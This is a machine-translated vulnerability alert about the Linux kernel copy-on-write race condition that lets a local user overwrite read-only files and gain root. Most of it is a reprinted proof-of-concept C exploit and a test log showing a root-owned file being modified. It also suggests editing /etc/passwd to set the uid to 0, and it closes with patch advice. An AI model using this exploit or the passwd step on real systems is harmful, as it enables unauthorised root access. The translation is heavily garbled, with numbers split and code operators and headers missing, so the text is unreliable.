The Linux kernel through kill to mention the right vulnerability alerts-a vulnerability alert-the black bar safety net

2016-10-29T00:00:00
ID MYHACK58:62201680685
Type myhack58
Reporter 佚名
Modified 2016-10-29T00:00:00

Description

The Linux kernel in the processing memory write copies Copy-on-Write when the existence conditions of competitive vulnerability, the result can be destruction of private read-only memory mapping. A low-privileged local user can exploit this vulnerability to obtain additional read-only memory-mapped write permission, it is possible to lead to further mention the right vulnerability. Vulnerability to hazards: a low-rights user can use the vulnerability to modify a read-only memory, and then execute arbitrary code to gain root privileges. Scope of impact: this vulnerability affects all Linux Kernel >= 2.6.22 version. 2.6.22 is 2 0 0 7 published in the version that this vulnerability affects almost 2 0 0 7 all future versions. Vulnerability testing: read /proc/version to get the LinuxKernel version: ➜ ~ cat /proc/version Linuxversion 4.4.0-4 2-generic(buildd@lgw01-1 3) (gcc version 5.4.0 2 0 1 6 0 6 0 9 (Ubuntu 5.4.0-6ubuntu1~16.04.2) )#6 2-Ubuntu SMP Fri Oct 7 2 3:1 1:4 5 UTC 20164.4.0 version of the Kernel, it is affected, github shows the following POC is:

include

include

include

include

include

void map; int f; structstat st; charname; voidmadviseThread(void arg) { char str; str = (char )arg; int i, c = 0; for (i = 0; i 1 0 0 0 0 0 0 0 0; i++) { c += madvise(map, 1 0 0, MADV_DONTNEED); } printf("madvise %d\n", c); } voidprocselfmemThread(void arg) { char str; str = (char )arg; int f = open("/proc/self/mem",O_RDWR); int i, c = 0; for (i = 0; i 1 0 0 0 0 0 0 0 0; i++) { lseek(f, map, SEEK_SET); c += write(f, str, strlen(str)); } printf("procselfmem %d\n", c); } intmain(int argc, char *argv[]) { if (argc 3) return 1; pthread_t pth1, pth2; f = open(argv[1], O_RDONLY); fstat(f, &st); name = argv[1]; map = mmap(NULL, st. st_size, PROT_READ,MAP_PRIVATE, f, 0); printf("mmap %x\n", map); pthread_create(&pth1, NULL,madviseThread, argv[1]); pthread_create(&pth2, NULL,procselfmemThread, argv[2]); pthread_join(pth1, NULL); pthread_join(pth2, NULL); return 0; }This POC can be exploit the vulnerability to modify any of the contents of the file, see the following test: ➜ /tmp-gcc a. c-lpthread a. c: Infunction ‘procselfmemThread’: a. c:2 8:5:warning: implicit declaration of function ‘lseek’[-Wimplicit-function-declaration] lseek(f, map, SEEK_SET); a. c:2 9:1 0:warning: implicit declaration of function ‘write’[-Wimplicit-function-declaration] c += write(f, str, strlen(str)); a. c: Infunction ‘main’: a. c:3 9:3:warning: implicit declaration of function ‘fstat’[-Wimplicit-function-declaration] fstat(f, &st);call gcc to compile this payload, the packet a few warning, but still compiles successfully. ➜ /tmp su root-c 'echo 0 0 0 0 > test' Password: ➜ /tmp ls-al test -rw-r--r--1 root root 5 Oct 1 6 2 3:5 2 test use the root permissions to create one other user read-only test file, the permission 6 4 4, 0 0 0 to 0. ➜ /tmp id uid=1 0 0 0(Monster) gid=1 0 0 0(monster) groups=1 0 0 0(monster) ➜ /tmp ./ a. out test 1 1 1 1 mmap61222000 madvise 0 procselfmem400000000 use the current user calls compiled out of a. out program to test the contents of the file to modify is 1 1 1 1, After a long wait after the program is finally executed is completed. ➜ /tmp cat test 1 1 1 1 You can see the results, test the content of the file has been successfully modified. This is the case, just modify the /etc/passwd of the current user uid changed to 0 can log in as root. Repair solutions: Update to the latest Linux Kernel source code, and re-compile. Each transmission line Edition also has updated the Kernel, but also directly upgrade to the latest version.